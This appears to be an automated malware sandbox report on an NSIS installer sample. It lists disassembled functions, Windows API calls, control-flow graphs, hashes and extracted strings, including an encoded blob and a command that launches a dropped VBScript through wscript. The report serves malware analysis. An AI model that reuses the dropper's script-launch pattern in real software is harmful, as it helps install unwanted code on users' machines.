                                                                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                    • API String ID: 2017177436-2404282005
                                                                                                                                    • Opcode ID: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                    • Opcode Fuzzy Hash: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403C29 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 149 403c29-403c41 call 40694b 152 403c43-403c53 call 40649e 149->152 153 403c55-403c8c call 406425 149->153 162 403caf-403cd8 call 403eff call 405f2e 152->162 157 403ca4-403caa lstrcatW 153->157 158 403c8e-403c9f call 406425 153->158 157->162 158->157 167 403d6a-403d72 call 405f2e 162->167 168 403cde-403ce3 162->168 173 403d80-403da5 LoadImageW 167->173 174 403d74-403d7b call 406594 167->174 168->167 169 403ce9-403d11 call 406425 168->169 169->167 176 403d13-403d17 169->176 178 403e26-403e2e call 40140b 173->178 179 403da7-403dd7 RegisterClassW 173->179 174->173 180 403d29-403d35 lstrlenW 176->180 181 403d19-403d26 call 405e53 176->181 192 403e30-403e33 178->192 193 403e38-403e43 call 403eff 178->193 182 403ef5 179->182 183 403ddd-403e21 SystemParametersInfoW CreateWindowExW 179->183 187 403d37-403d45 lstrcmpiW 180->187 188 403d5d-403d65 call 405e26 call 406557 180->188 181->180 186 403ef7-403efe 182->186 183->178 187->188 191 403d47-403d51 GetFileAttributesW 187->191 188->167 195 403d53-403d55 191->195 196 403d57-403d58 call 405e72 191->196 192->186 202 403e49-403e63 ShowWindow call 4068db 193->202 203 403ecc-403ed4 call 4056af 193->203 195->188 195->196 196->188 208 403e65-403e6a call 4068db 202->208 209 403e6f-403e81 GetClassInfoW 202->209 210 403ed6-403edc 203->210 211 403eee-403ef0 call 40140b 203->211 208->209 214 403e83-403e93 GetClassInfoW RegisterClassW 209->214 215 403e99-403eca DialogBoxParamW call 40140b call 403b79 209->215 210->192 216 403ee2-403ee9 call 40140b 210->216 211->182 214->215 215->186 216->192
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                    • lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
                                                                                                                                    • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                                                                    • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                    • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 1975747703-236412282
                                                                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403082 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 223 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 226 4030d2-4030d7 223->226 227 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 223->227 228 4032b2-4032b6 226->228 235 403110 227->235 236 4031f5-403203 call 40301e 227->236 238 403115-40312c 235->238 242 403205-403208 236->242 243 403258-40325d 236->243 240 403130-403139 call 4034d4 238->240 241 40312e 238->241 249 40325f-403267 call 40301e 240->249 250 40313f-403146 240->250 241->240 245 40320a-403222 call 4034ea call 4034d4 242->245 246 40322c-403256 GlobalAlloc call 4034ea call 4032b9 242->246 243->228 245->243 271 403224-40322a 245->271 246->243 270 403269-40327a 246->270 249->243 254 4031c2-4031c6 250->254 255 403148-40315c call 406002 250->255 259 4031d0-4031d6 254->259 260 4031c8-4031cf call 40301e 254->260 255->259 274 40315e-403165 255->274 265 4031e5-4031ed 259->265 266 4031d8-4031e2 call 406a38 259->266 260->259 265->238 269 4031f3 265->269 266->265 269->236 275 403282-403287 270->275 276 40327c 270->276 271->243 271->246 274->259 278 403167-40316e 274->278 280 403288-40328e 275->280 276->275 278->259 279 403170-403177 278->279 279->259 281 403179-403180 279->281 280->280 282 403290-4032ab SetFilePointer call 406002 280->282 281->259 283 403182-4031a2 281->283 286 4032b0 282->286 283->243 285 4031a8-4031ac 283->285 287 4031b4-4031bc 285->287 288 4031ae-4031b2 285->288 286->228 287->259 289 4031be-4031c0 287->289 288->269 288->287 289->259
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF
                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                                                                                                                                    Strings
                                                                                                                                    • Null, xrefs: 00403179
                                                                                                                                    • Inst, xrefs: 00403167
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                                                                    • soft, xrefs: 00403170
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                                    • Error launching installer, xrefs: 004030D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 2803837635-1044865066
                                                                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 290 4032b9-4032d0 291 4032d2 290->291 292 4032d9-4032e2 290->292 291->292 293 4032e4 292->293 294 4032eb-4032f0 292->294 293->294 295 403300-40330d call 4034d4 294->295 296 4032f2-4032fb call 4034ea 294->296 300 4034c2 295->300 301 403313-403317 295->301 296->295 302 4034c4-4034c5 300->302 303 40346d-40346f 301->303 304 40331d-403366 GetTickCount 301->304 307 4034cd-4034d1 302->307 305 403471-403474 303->305 306 4034af-4034b2 303->306 308 4034ca 304->308 309 40336c-403374 304->309 305->308 310 403476 305->310 313 4034b4 306->313 314 4034b7-4034c0 call 4034d4 306->314 308->307 311 403376 309->311 312 403379-403387 call 4034d4 309->312 316 403479-40347f 310->316 311->312 312->300 324 40338d-403396 312->324 313->314 314->300 322 4034c7 314->322 319 403481 316->319 320 403483-403491 call 4034d4 316->320 319->320 320->300 327 403493-40349f call 4060f9 320->327 322->308 326 40339c-4033bc call 406aa6 324->326 332 4033c2-4033d5 GetTickCount 326->332 333 403465-403467 326->333 334 4034a1-4034ab 327->334 335 403469-40346b 327->335 336 403420-403422 332->336 337 4033d7-4033df 332->337 333->302 334->316 342 4034ad 334->342 335->302 340 403424-403428 336->340 341 403459-40345d 336->341 338 4033e1-4033e5 337->338 339 4033e7-40341d MulDiv wsprintfW call 4055dc 337->339 338->336 338->339 339->336 344 40342a-403431 call 4060f9 340->344 345 40343f-40344a 340->345 341->309 346 403463 341->346 342->308 350 403436-403438 344->350 349 40344d-403451 345->349 346->308 349->326 351 403457 349->351 350->335 352 40343a-40343d 350->352 351->308 352->349
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • ... %d%%, xrefs: 00403400
                                                                                                                                    • A, xrefs: 00403379
                                                                                                                                    • A, xrefs: 00403483
                                                                                                                                    • Wa+BKmsSxijL0M6HU8UlEOHEX0W4qJVOi+4o/+r4xuW4akzuquTsqs12o9a5mJuac3OoUPQTebamLvDjiKXnLZpN0JaiUym/5rzp0FZR6is2WvaUb03if+q5dpk8ngDo8D4utGAJtaQmGVDCYjM+ssBvJuB0L8h0LwGK9VsOW/iaVIvz6lsLFq7WuuIAOiOhDVs8SWueGeepJey+APZ9AngJ8/GHvNSJGrjYLE8PtJvnkfgYavejAThOUugGeRIfF91R, xrefs: 0040333D
                                                                                                                                    • *B, xrefs: 004032E4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: *B$ A$ A$... %d%%$Wa+BKmsSxijL0M6HU8UlEOHEX0W4qJVOi+4o/+r4xuW4akzuquTsqs12o9a5mJuac3OoUPQTebamLvDjiKXnLZpN0JaiUym/5rzp0FZR6is2WvaUb03if+q5dpk8ngDo8D4utGAJtaQmGVDCYjM+ssBvJuB0L8h0LwGK9VsOW/iaVIvz6lsLFq7WuuIAOiOhDVs8SWueGeepJey+APZ9AngJ8/GHvNSJGrjYLE8PtJvnkfgYavejAThOUugGeRIfF91R
                                                                                                                                    • API String ID: 551687249-1049729664
                                                                                                                                    • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                    • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 353 406594-40659d 354 4065b0-4065ca 353->354 355 40659f-4065ae 353->355 356 4065d0-4065dc 354->356 357 4067da-4067e0 354->357 355->354 356->357 360 4065e2-4065e9 356->360 358 4067e6-4067f3 357->358 359 4065ee-4065fb 357->359 362 4067f5-4067fa call 406557 358->362 363 4067ff-406802 358->363 359->358 361 406601-40660a 359->361 360->357 364 406610-406653 361->364 365 4067c7 361->365 362->363 369 406659-406665 364->369 370 40676b-40676f 364->370 367 4067d5-4067d8 365->367 368 4067c9-4067d3 365->368 367->357 368->357 371 406667 369->371 372 40666f-406671 369->372 373 406771-406778 370->373 374 4067a3-4067a7 370->374 371->372 377 406673-406699 call 406425 372->377 378 4066ab-4066ae 372->378 375 406788-406794 call 406557 373->375 376 40677a-406786 call 40649e 373->376 379 4067b7-4067c5 lstrlenW 374->379 380 4067a9-4067b2 call 406594 374->380 389 406799-40679f 375->389 376->389 394 406753-406756 377->394 395 40669f-4066a6 call 406594 377->395 384 4066b0-4066bc GetSystemDirectoryW 378->384 385 4066c1-4066c4 378->385 379->357 380->379 390 40674e-406751 384->390 391 4066d6-4066da 385->391 392 4066c6-4066d2 GetWindowsDirectoryW 385->392 389->379 396 4067a1 389->396 390->394 397 406763-406769 call 406805 390->397 391->390 393 4066dc-4066fa 391->393 392->391 399 4066fc-406702 393->399 400 40670e-406726 call 40694b 393->400 394->397 402 406758-40675e lstrcatW 394->402 395->390 396->397 397->379 406 40670a-40670c 399->406 410 406728-40673b SHGetPathFromIDListW CoTaskMemFree 400->410 411 40673d-406746 400->411 402->397 406->400 408 406748-40674c 406->408 408->390 410->408 410->411 411->393 411->408
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066CC
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                    • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
                                                                                                                                    • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067B8
                                                                                                                                    Strings
                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 4024019347-730719616
                                                                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401774 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 412 401774-401799 call 402dab call 405e9d 417 4017a3-4017b5 call 406557 call 405e26 lstrcatW 412->417 418 40179b-4017a1 call 406557 412->418 423 4017ba-4017bb call 406805 417->423 418->423 427 4017c0-4017c4 423->427 428 4017c6-4017d0 call 4068b4 427->428 429 4017f7-4017fa 427->429 437 4017e2-4017f4 428->437 438 4017d2-4017e0 CompareFileTime 428->438 431 401802-40181e call 406047 429->431 432 4017fc-4017fd call 406022 429->432 439 401820-401823 431->439 440 401892-4018bb call 4055dc call 4032b9 431->440 432->431 437->429 438->437 441 401874-40187e call 4055dc 439->441 442 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 439->442 454 4018c3-4018cf SetFileTime 440->454 455 4018bd-4018c1 440->455 452 401887-40188d 441->452 442->427 474 401869-40186a 442->474 456 402c38 452->456 458 4018d5-4018e0 FindCloseChangeNotification 454->458 455->454 455->458 462 402c3a-402c3e 456->462 459 4018e6-4018e9 458->459 460 402c2f-402c32 458->460 463 4018eb-4018fc call 406594 lstrcatW 459->463 464 4018fe-401901 call 406594 459->464 460->456 470 401906-4023a7 call 405bb7 463->470 464->470 470->460 470->462 474->452 476 40186c-40186d 474->476 476->441
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,"wscript.exe" "C:\Users\user\start.vbs","wscript.exe" "C:\Users\user\start.vbs",00000000,00000000,"wscript.exe" "C:\Users\user\start.vbs",00440000,?,?,00000031), ref: 004017DA
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: "wscript.exe" "C:\Users\user\start.vbs"$C:\Users\user
                                                                                                                                    • API String ID: 1941528284-590609670
                                                                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 478 4068db-4068fb GetSystemDirectoryW 479 4068fd 478->479 480 4068ff-406901 478->480 479->480 481 406912-406914 480->481 482 406903-40690c 480->482 484 406915-406948 wsprintfW LoadLibraryExW 481->484 482->481 483 40690e-406910 482->483 483->484
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
